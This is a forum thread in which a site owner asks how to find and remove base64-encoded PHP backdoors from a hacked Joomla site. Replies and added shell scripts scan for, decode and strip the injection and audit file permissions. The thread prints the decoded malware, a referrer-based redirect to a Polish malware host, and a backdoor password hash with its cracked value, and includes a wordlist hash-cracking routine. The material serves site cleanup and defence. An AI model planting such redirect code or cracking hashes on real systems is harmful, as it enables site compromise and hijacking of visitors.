Find and replace command

About writing shell scripts and making the most of your shell
livicrew

Find and replace command

Post by livicrew »

Hi guys,

Recently I needed to clean up hacked code on my web server. I used the following to find the base64 coding:

find . -type f -name "*.php" -exec grep -H "eval(base64decode)..." {} \; > potentially_infected_files.txt
This gave me a list of infected files; I then manually deleted the scripting.

How could I use this command (or sed) to find the code in every file on the server and then replace it with a space?

Possibly a script I can run manually when I am suspicious of a compromise.
Any help would be much appreciated.
Last edited by LockBot on Wed Dec 28, 2022 7:16 am, edited 1 time in total.
Habitual

Re: Find and replace command

Post by Habitual »

find . -type f -name "*.php" -exec sed -i 's/<?php \/\*\*\/ eval(base64_decode("DQplcn.*?>//g' {} \;
should remove them/it.

YMMV. Make backups.
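The two posts above amount to a procedure: find every PHP file carrying the injected `<?php /**/ eval(base64_decode("...")); ?>` line, then strip it in place. The script below is an added example (not code from either poster) that does both steps with a backup and a re-scan, so you can see the hits before touching anything and confirm nothing matches afterwards. It assumes GNU grep/sed/find and, like Habitual's sed pattern, that the whole injection sits on one line; the regex `INJ_ERE` is a generalisation of that pattern and is an assumption, not something quoted from the thread.

```shell
#!/bin/sh
# Added example (not from the thread): scan a web root for the injected
#   <?php /**/ eval(base64_decode("...")); ?>
# line, back every hit up, strip the line, then re-scan to confirm.
# Assumptions: GNU grep/sed/find; the injection is on a single line.

# Extended regex for the injection. Literal "<?php /**/ eval(base64_decode("
# followed by a base64 blob and the closing ")); ?>" (whitespace tolerant).
INJ_ERE='<\?php /\*\*/ eval\(base64_decode\("[A-Za-z0-9+/=]+"\)\); *\?>'

# List PHP files under $1 containing the injection, one path per line.
# "No hits" is a normal result here, not an error.
scan_php() {
    grep -rlE --include='*.php' -e "$INJ_ERE" "$1" 2>/dev/null || true
}

# Back up and clean every hit under $1, printing "cleaned <path>" per file.
# Returns 1 if anything still matches afterwards.
clean_php() {
    scan_php "$1" | while IFS= read -r f; do
        cp -p -- "$f" "$f.bak"                        # keep evidence and a rollback
        # Strip the injection. It is usually prepended on line 1 ahead of the
        # real "<?php", so also drop line 1 if the substitution emptied it:
        # a leading blank line would be sent to the browser and break header().
        sed -E -i -e "s|$INJ_ERE||g" -e '1{/^$/d;}' -- "$f"
        printf 'cleaned %s\n' "$f"
    done
    # Verify: nothing should match now.
    if scan_php "$1" | grep -q .; then
        return 1
    fi
    return 0
}

# Usage: sh scan_clean.sh /var/www          (dry run: list hits only)
#        sh scan_clean.sh /var/www clean    (back up and strip)
if [ $# -gt 0 ]; then
    if [ "${2:-}" = "clean" ]; then clean_php "$1"; else scan_php "$1"; fi
fi
```

Run the dry-run form first and read the list; a backdoor that matches the pattern is one symptom, and files that do not match can still be malicious, so the list is a starting point for review, not proof that everything else is clean.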
Habitual

Re: Find and replace command

Post by Habitual »

BTW:

That reads

$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"yandex.ru") or stristr($referer,"rambler.ru") or stristr($referer,"mail.ru") or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live")) {
	if (!stristr($referer,"cache") or !stristr($referer,"inurl")){		
		header("Location: http://newyrfhrh.bij.pl/");
		exit();
	}
}
}
which comes from

echo '<long_string_after_eval(base64decode)>' | base64 -d
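Decoding by hand works for one file, but these droppers are often nested (the decoded text is itself another `eval(base64_decode("..."))`), and copying a long blob into `echo` by hand is error-prone. The script below is an added example, not code from the thread: it pulls the base64 argument out of the file and decodes layer by layer until plain PHP comes out. It assumes GNU grep and coreutils `base64`, and that each layer is plain base64 (payloads wrapped in `gzinflate()` or `str_rot13()` would need an extra step); the function names and the sample payload in the usage are mine.

```shell
#!/bin/sh
# Added example (not from the thread): extract and decode the payload of
# eval(base64_decode("...")) from a PHP file, following nested layers.
# Assumptions: GNU grep, coreutils base64, plain base64 per layer.

# Print the base64 argument of the first eval(base64_decode("...")) on stdin,
# or nothing if there is none. Requiring the eval( prefix avoids chasing an
# unrelated base64_decode() call inside the real payload.
extract_b64() {
    grep -oE 'eval\( *base64_decode\( *"[A-Za-z0-9+/=]+" *\) *\)' | head -n 1 |
        sed -E 's|.*"([A-Za-z0-9+/=]+)".*|\1|'
}

# Decode every layer of file $1 and print the innermost plain text.
# Returns 1 if the file has no eval(base64_decode(...)) call or a layer
# fails to decode. Stops after 10 layers to avoid runaway nesting.
decode_layers() {
    text=$(cat -- "$1")
    n=0
    while :; do
        b64=$(printf '%s' "$text" | extract_b64)
        [ -n "$b64" ] || break
        text=$(printf '%s' "$b64" | base64 -d 2>/dev/null) || return 1
        n=$((n + 1))
        [ "$n" -lt 10 ] || break
    done
    [ "$n" -gt 0 ] || return 1
    printf '%s\n' "$text"
}

# Usage: sh decode.sh suspicious.php [more.php ...]
if [ $# -gt 0 ]; then
    for f in "$@"; do
        printf '== %s\n' "$f"
        decode_layers "$f" || echo '(no eval(base64_decode(...)) layer found)'
    done
fi
```

Read the decoded output in a pager or editor, never pipe it into `php`; the point is to learn what the dropper does (redirect targets, hard-coded credentials, file writes), which is also where the `$auth_pass` hash discussed further down in the thread would show up.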
livicrew

Re: Find and replace command

Post by livicrew »

Thanks for that, I will make very good use of it.

How did you 'read' the file? Also, can I find the password he used in his script?

I read this, and the guy managed to read the password: blog.kejsarmakten.se/all/software/2011/01/14/malware-in-joomla.html. This was the exact hack I had.

This would be useful, as I could delete every backdoor on my website using his script.

Thanks again

Peter
Habitual

Re: Find and replace command

Post by Habitual »

Peter:

So you are running Joomla?
You do realize that all PHP scripts are now suspect?
Is this shared hosting or not?

I 'found' it with terminal >

echo '...' | base64 -d
Password...? It's a common redirect that says "you're going to visit http://newyrfhrh.bij.pl/" if you come from {list_of_referrers}.
"It took us a long time to notice the attack since the only visible change they made to the website was to redirect google searches from our website to malware websites in Poland."
This is a first step in many attacks, but it is actually the symptom of a hack. What does

find "$(pwd)" -type f -name z.php -exec less {} \;
show us?
The password is usually hard-coded in php file somewhere (in clear or obfuscated text).

Is http://blog.kejsarmakten.se/all/softwar ... oomla.html your article?

Tighten up Joomla if you run it and never run joomla if you don't.
More holes than a Microsoft Product IMO.
Only thing worse is telnet.

Joomla gallery components are a popular target.

I learned 80% of this by extensive reading at
http://blog.unmaskparasites.com/ and
http://25yearsofprogramming.com/blog/

Lemme know...

Subscribed with interest...

JJ
livicrew

Re: Find and replace command

Post by livicrew »

Hi

It's not my article, I found it while working on my hack on my Joomla website. It appears the com_oziogallery had a backdoor; I have removed Ozio. Also I use Coppermine galleries, which also had/has a backdoor; I have the latest version, but still not sure how secure it is.

I am on shared hosting.
Habitual

Re: Find and replace command

Post by Habitual »

Peter:
livicrew wrote:... Also, can I find the password he used in his script?
Terminal >

find "$(pwd)" -type f -name "*.php" -exec grep -H '$auth_pass' {} \;
If you get a "63a9f0ea7bb98050796b649e85481845" in the output, the password is "root" (no quotes).
livicrew wrote:...as I could delete every backdoor onto my website using his script.
Without better Joomla security, it will just come right back.

All Files except .cgi should be 644
All directories should be 755

Shared hosting. Ugh.

Should you decide that you need a more in-depth investigation and solution, send me a PM with your everyday email address and we can continue discussing your Security and/or remedy.

JJ
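The post above gives two checks a practitioner would want to automate: pull every hard-coded `$auth_pass` hash out of the PHP tree and test it against a wordlist (the hash quoted is MD5 of "root"), and audit file and directory modes against the 644/755 rule. The script below is an added example, not the poster's code; it assumes GNU find (for `-printf`), coreutils `md5sum`, and that the backdoor stores the password as a 32-hex MD5 in a `$auth_pass = "..."` assignment, which is the form the thread discusses. The wordlist is a constructed five-entry stand-in; a real run would use a proper list.

```shell
#!/bin/sh
# Added example (not from the thread): find hard-coded $auth_pass MD5 hashes
# in PHP files, try each against a small wordlist, and report files that are
# not 0644 (ignoring .cgi) or directories that are not 0755.
# Assumptions: GNU find, coreutils md5sum; $auth_pass holds a 32-hex MD5.

# Constructed stand-in wordlist for the demo.
WORDLIST="root admin password 123456 letmein"

# Regex: literal "$auth_pass", optional spaces, "=", a quote, 32 hex digits.
AUTH_RE="\\\$auth_pass *= *['\"][0-9a-f]{32}"

# Print "hash path" for every matching assignment under $1 (hash first so a
# path containing spaces survives a later "read -r h f").
find_auth_pass() {
    grep -rHoE --include='*.php' "$AUTH_RE" "$1" 2>/dev/null |
        sed -E 's/^(.*):.*([0-9a-f]{32})$/\2 \1/' || true
}

# Print the wordlist entry whose MD5 equals $1, or return 1 if none does.
crack_md5() {
    for w in $WORDLIST; do
        h=$(printf '%s' "$w" | md5sum | cut -d' ' -f1)
        if [ "$h" = "$1" ]; then
            printf '%s\n' "$w"
            return 0
        fi
    done
    return 1
}

# Report "mode path" for every file not 0644 (except .cgi) and every
# directory not 0755 under $1. Empty output means the tree is compliant.
audit_modes() {
    find "$1" -type f ! -name '*.cgi' ! -perm 644 -printf '%m %p\n'
    find "$1" -type d ! -perm 755 -printf '%m %p\n'
}

# Usage: sh backdoor_audit.sh /var/www
if [ $# -gt 0 ]; then
    find_auth_pass "$1" | while read -r h f; do
        guess=$(crack_md5 "$h") || guess='(not in wordlist)'
        printf '%s: %s -> %s\n' "$f" "$h" "$guess"
    done
    audit_modes "$1"
fi
```

A hit from `find_auth_pass` is worth keeping with its path and hash before deleting the file: the password the attacker chose is often reused across the other backdoors they dropped, and it is evidence if the host or hosting provider asks what happened.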
Habitual

Re: Find and replace command

Post by Habitual »

Peter:
livicrew wrote:...It appears the com_oziogallery had a backdoor, I have removed ozio. Also I use coppermine galleries which also had/has a backdoor, I have the latest version, but still not sure how secure it is.
Got backup?
livicrew

Re: Find and replace command

Post by livicrew »

Thanks for that. I will keep my eye on it and if I need help, I will give you a shout.

Maybe I should go back to a 'normal' website and drop Joomla!
Habitual

Re: Find and replace command

Post by Habitual »

Peter:

Check your PMs...